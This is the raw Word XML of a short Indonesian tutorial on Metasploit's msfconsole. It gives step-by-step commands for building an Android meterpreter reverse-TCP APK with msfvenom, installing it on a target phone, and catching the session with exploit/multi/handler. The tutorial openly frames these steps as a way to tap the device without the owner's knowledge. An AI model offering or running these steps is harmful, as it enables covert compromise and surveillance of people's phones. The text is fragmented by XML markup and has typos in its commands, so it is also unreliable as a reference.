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78FD" w14:textId="6C61E3F3" w:rsidR="00B341E2" w:rsidRPr="002A6C74" w:rsidRDefault="0084327B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A6C74">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MFS Console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0272CB3B" w14:textId="23982797" w:rsidR="0084327B" w:rsidRPr="002A6C74" w:rsidRDefault="0084327B" w:rsidP="00843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Pengertian</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="37CDC741" w14:textId="1C261651" w:rsidR="0084327B" w:rsidRPr="002A6C74" w:rsidRDefault="0084327B" w:rsidP="0084327B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6C7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6C7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MSFconsole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Metasploit Framework.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, kaya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, dan supported tools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Framework.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MSFconsole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all-in-one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o</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="002A6C74">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>psi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Framework.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MFSconsole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enumerate,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listener,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Metasploit Framework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MSFconsole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>,</w:t>
      </w:r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32DD4A" w14:textId="224587B9" w:rsidR="0084327B" w:rsidRPr="002A6C74" w:rsidRDefault="0084327B" w:rsidP="00843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6C74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14:paraId="60749175" w14:textId="715670B8" w:rsidR="0084327B" w:rsidRPr="002A6C74" w:rsidRDefault="0084327B" w:rsidP="008432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MFSconsole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menyadap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android:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2F466C" w14:textId="2926C654" w:rsidR="0084327B" w:rsidRPr="002A6C74" w:rsidRDefault="002C49ED" w:rsidP="00843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msfvenom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-p android/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meterpreter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reserve_tcp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LHOST</w:t>
      </w:r>
      <w:proofErr w:type="gram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spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002A6C74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localhost] LPORT=4444 -o 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test.apk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BlackArch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test.apk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di install pada android target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0852D56C" w14:textId="77777777" w:rsidR="002A6C74" w:rsidRPr="002A6C74" w:rsidRDefault="002A6C74" w:rsidP="002C49ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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933D16" w14:textId="5A7CFF16" w:rsidR="002C49ED" w:rsidRPr="002A6C74" w:rsidRDefault="002A6C74" w:rsidP="002C49E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6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24AE0" wp14:editId="3C3BBAE0">
            <wp:extent cx="4406238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1" b="3574"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4413982" cy="214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8B9A0" w14:textId="3D4C456C" w:rsidR="002C49ED" w:rsidRPr="002A6C74" w:rsidRDefault="002C49ED" w:rsidP="00843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msfconsole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6C74">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">pada terminal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metasloit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="321008FE" w14:textId="07F829DF" w:rsidR="002C49ED" w:rsidRPr="002A6C74" w:rsidRDefault="002C49ED" w:rsidP="002C49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r w:rsidRPr="002A6C74">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r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set payload </w:t>
      </w:r>
      <w:r w:rsidRPr="002A6C74">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>android/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meterpreter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reserve_tcp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LHOST</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002A6C74">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002A6C74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localhost]</w:t>
      </w:r>
      <w:r w:rsidRPr="002A6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6C74">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LPORT=4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC623B6" w14:textId="77777777" w:rsidR="002A6C74" w:rsidRPr="002A6C74" w:rsidRDefault="002A6C74" w:rsidP="002C49ED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566B1159" w14:textId="0B364372" w:rsidR="002C49ED" w:rsidRPr="002A6C74" w:rsidRDefault="002A6C74" w:rsidP="002C49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6C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82D75" wp14:editId="3C9B73A2">
            <wp:extent cx="4533900" cy="221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7" b="3164"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4551196" cy="22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FFF27" w14:textId="638BF374" w:rsidR="002C49ED" w:rsidRPr="002A6C74" w:rsidRDefault="002C49ED" w:rsidP="00843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jedela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metasplot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device yang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sadap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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B079783" w14:textId="40239FC1" w:rsidR="002C49ED" w:rsidRPr="002A6C74" w:rsidRDefault="002A6C74" w:rsidP="00843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6C74">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Pada terminal Metasploit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target dan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sepengetahuan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C74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2A6C74">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232C07B2" w14:textId="5E9B5426" w:rsidR="0084327B" w:rsidRPr="002A6C74" w:rsidRDefault="0084327B" w:rsidP="008432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327B" w:rsidRPr="002A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5DB1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1BDABD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E66631"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="82EC39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7B"/>
    <w:rsid w:val="002A6C74"/>
    <w:rsid w:val="002C49ED"/>
    <w:rsid w:val="00520D28"/>
    <w:rsid w:val="0084327B"/>
    <w:rsid w:val="00BC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7DF5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EBB65173-AE37-42FB-9406-CA4D1EFF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Khoiruman</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Arif Khoiruman</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-14T04:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-14T05:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>